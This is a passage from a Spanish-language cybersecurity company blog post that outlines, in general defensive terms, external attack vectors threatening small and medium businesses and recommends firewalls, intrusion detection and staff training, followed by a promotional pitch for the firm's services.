Los vectores externos son aquellos que aprovechan las vulnerabilidades en la infraestructura externa de una PYME, como el sitio web o las conexiones de red. Los ciberdelincuentes pueden llevar a cabo ataques de inyección SQL, ataques de fuerza bruta o incluso intentos de comprometer servidores web. Para protegerse, es crucial implementar firewalls robustos, sistemas de detección y prevención de intrusiones, y realizar pruebas de penetración periódicas para identificar y remediar posibles puntos débiles.
Conclusión
En conclusión, las PYMES se enfrentan a una serie de vectores de ataque que pueden comprometer la seguridad de su red y activos. Sin embargo, con las medidas adecuadas de seguridad de la información y una conciencia constante, es posible mitigar estos riesgos. Recuerde educar a sus empleados sobre las mejores prácticas de seguridad, mantener todos los sistemas y aplicaciones actualizados, implementar políticas sólidas de uso de activos y dispositivos externos, y fortalecer su infraestructura con firewalls y sistemas de detección y prevención de intrusiones.
¿Por qué confiar en DCSeguridad?
En DCSeguridad, somos expertos en ciberseguridad y estamos comprometidos con la protección de las PYMES. Ofrecemos servicios integrales de seguridad de la información, desde auditorías de seguridad y consultoría hasta implementación de soluciones y gestión de incidentes. No deje la seguridad de su negocio al azar, póngase en contacto con nosotros hoy mismo para obtener más información sobre cómo podemos ayudarlo a proteger su empresa. Además, lo invitamos a unirse a nuestro canal de Telegram, donde compartimos consejos y actualizaciones de seguridad relevantes.
Proteja su negocio, proteja su futuro. En DCSeguridad, estamos aquí para ayudarlo.
Para ofrecer las mejores experiencias, utilizamos tecnologías como las cookies para almacenar y/o acceder a la información del dispositivo. El consentimiento de estas tecnologías nos permitirá procesar datos como el comportamiento de navegación o las identificaciones únicas en este sitio. No consentir o retirar el consentimiento, puede afectar negativamente a ciertas características y funciones.
Funcional
Siempre activo
El almacenamiento o acceso técnico es estrictamente necesario para el propósito legítimo de permitir el uso de un servicio específico explícitamente solicitado por el abonado o usuario, o con el único propósito de llevar a cabo la transmisión de una comunicación a través de una red de comunicaciones electrónicas.
Preferencias
El almacenamiento o acceso técnico es necesario para la finalidad legítima de almacenar preferencias no solicitadas por el abonado o usuario.
Estadísticas
El almacenamiento o acceso técnico que es utilizado exclusivamente con fines estadísticos.El almacenamiento o acceso técnico que se utiliza exclusivamente con fines estadísticos anónimos. Sin un requerimiento, el cumplimiento voluntario por parte de tu proveedor de servicios de Internet, o los registros adicionales de un tercero, la información almacenada o recuperada sólo para este propósito no se puede utilizar para identificarte.
Marketing
El almacenamiento o acceso técnico es necesario para crear perfiles de usuario para enviar publicidad, o para rastrear al usuario en una web o en varias web con fines de marketing similares.